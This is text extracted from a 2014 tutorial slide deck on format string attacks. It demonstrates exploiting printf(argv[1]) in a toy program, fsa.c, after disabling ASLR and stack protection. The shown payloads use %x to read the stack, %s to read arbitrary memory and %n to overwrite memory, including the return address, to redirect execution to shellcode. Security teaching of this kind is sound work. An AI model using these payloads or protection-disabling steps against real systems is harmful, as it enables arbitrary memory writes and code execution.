Format String AttacksAJ

2014.1.18

About Me

• Study in National Chung Cheng University

• The simulator of 5 axis CNC machine tool• CUDA programming for the collision detection in real time

• 若渴計畫 & MOSUT

Outline

• Illustrating format string vulnerabilities • A case study• fsa.c• Compile and setup insecure environment• Viewing the stack• Viewing memory at any location• Overwriting of arbitrary memory

• So, you can…

Format String Vulnerabilities

• format string <->argv[1]• printf(argv[1])• strcpy(buff,argv[1])• snprintf(buf,sizeof buf,argv[1]);• …

• EX:

compile & execute

A Case Study: fsa.c

A Case Study: Compile and Setup Insecure Environment•Compile• gcc -g -Wno-format-security -fno-stack-protector fsa.c

•Disable ASLR(address space layout randomization)• sudo sysctl -w kernel.randomize_va_space=0

•X86 machine & Unbuntu 12.04

Stack Status before Executing snpritf()

??

??

??

x = 97 = ‘a’

buf[100]

stack

esp

Viewing the Stack:”%x.%x.%x.%x.%x”• Format string = %x.%x.%x.%x.%x

• snprintf(buf, sizeof buf, argv[1]) =>snprintf(buf, sizeof buf, “%x.%x.%x.%x.%x”)

Buffer pointer

Buffer length

argv[1] pointer

?? b7ff3fec

?? bfffff3b4

?? 0

x = 97 = ‘a’

buf[100]

“%x.%x.%x.%x.%x”

heap

Richard Reese, 透視 c 語言指標 p.128

c call conventionhttp://descent-incoming.blogspot.tw/2012/11/pascal-call-convention-in-c.html

Viewing the Stack:”%x.%x.%x.%x.%x”• Format string = %x.%x.%x.%x.%x

• snprintf(buf, sizeof buf, argv[1]) =>snprintf(buf, sizeof buf, “%x.%x.%x.%x.%x”)

Buffer pointer

Buffer length

argv[1] pointer

?? b7ff3fec

?? bfffff3b4

?? 0

x = 97 = ‘a’

buf[100]

“%x.%x.%x.%x.%x”

heap

%x

%x

%x%x

%x

fetch

stack

Viewing the Stack:”%x.%x.%x.%x.%x”• Format string = %x.%x.%x.%x.%x

• snprintf(buf, sizeof buf, argv[1]) =>snprintf(buf, sizeof buf, “%x.%x.%x.%x.%x”)

Buffer pointer

Buffer length

argv[1] pointer

?? b7ff3fec

?? bfffff3b4

?? 0

x = 97 = ‘a’

buf[100]=b7ff3fec. Bfffff3b4. 0.61.66663762(ff7b)

“%x.%x.%x.%x.%x”

heap

copy

Execution order of “copy” and “fetch” are switched by OS

%x??

Viewing the Stack: “aaaa.%x.%x.%x.%x.%x”• Format string = aaaa.%x.%x.%x.%x.%x

• ‘a’ is 0x61 in ASCII• snprintf(buf, sizeof buf, “aaaa.%x.%x.%x.%x.%x”)

Buffer pointer

Buffer length

argv[1] pointer

?? b7ff3fec

?? bfffff3b4

?? 0

x = 97 = ‘a’

buf[100]=aaaa.b7ff3fec.bffff3a4.0.61.61616161

“aaaa.%x.%x.%x.%x.%x”

heap

%x

%x

%x%x

%x

Viewing Memory at Any Location

• Format string = $(printf “\xf8\xf2\xff\xbf”).%x.%x.%x.%x.%x

• Format string = $(printf “\xf8\xf2\xff\xbf”).%x.%x.%x.%x.%s

x = 97 = ‘a’

buf[0]=bffff2f8%s

bffff2f8

Overwriting of Arbitrary Memory

• The %n field was encountered in the format string• Format string = $(printf “\xf8\xf2\xff\xbf”).%x.%x.%x.%x.%n

x = 97 = ‘a’

buf[0]=bffff2f8%s

bffff2f8 x = 28 = 0x1c

buf[0]=bffff2f8%n

bffff2f8

26(??) alignment

So, You Can…

• Format string vulnerabilities • Viewing the stack

• Finding return addresses

• Overwriting return address • Overwriting return addresses to point to shellcode• EX: $ ./a.out $(printf “return address”).%x.%x.%x.%x.%n => retrun address = 28 $ ./a.out $(printf “return address”).%x.%x.%x.%4x.%n => retrun address = 30 $ ./a.out $(printf “return address”).%x.%x.%x.%8x.%n => retrun address = 34 $ ./a.out $(printf “return address”).%Xx.%Yx.%Zx.%Ax.%n => retrun address = shellcode address

You can overwrite arbitrary memory, if there are format string vulnerabilities

Reference

• Tim Newsham, “Format String Attacks”• http://www.thenewsh.com/~newsham/format-string-attacks.pdf

• stackoverflow,“How can a Format-String vulnerability be exploited?”• http://stackoverflow.com/questions/7459630/how-can-a-format-string-vulnerability

-be-exploited

• Paul Haas, Advanced Format String Attacks• http://

www.defcon.org/images/defcon-18/dc-18-presentations/Haas/DEFCON-18-Haas-Adv-Format-String-Attacks.pdf

• David Brumley, Cource sliedes• http://users.ece.cmu.edu/~dbrumley/courses/18739c-s11/slides/0127.pdf

• Scut et al,”Exploiting Format String Vulnerabilities” • http://crypto.stanford.edu/cs155/papers/formatstring-1.2.pdf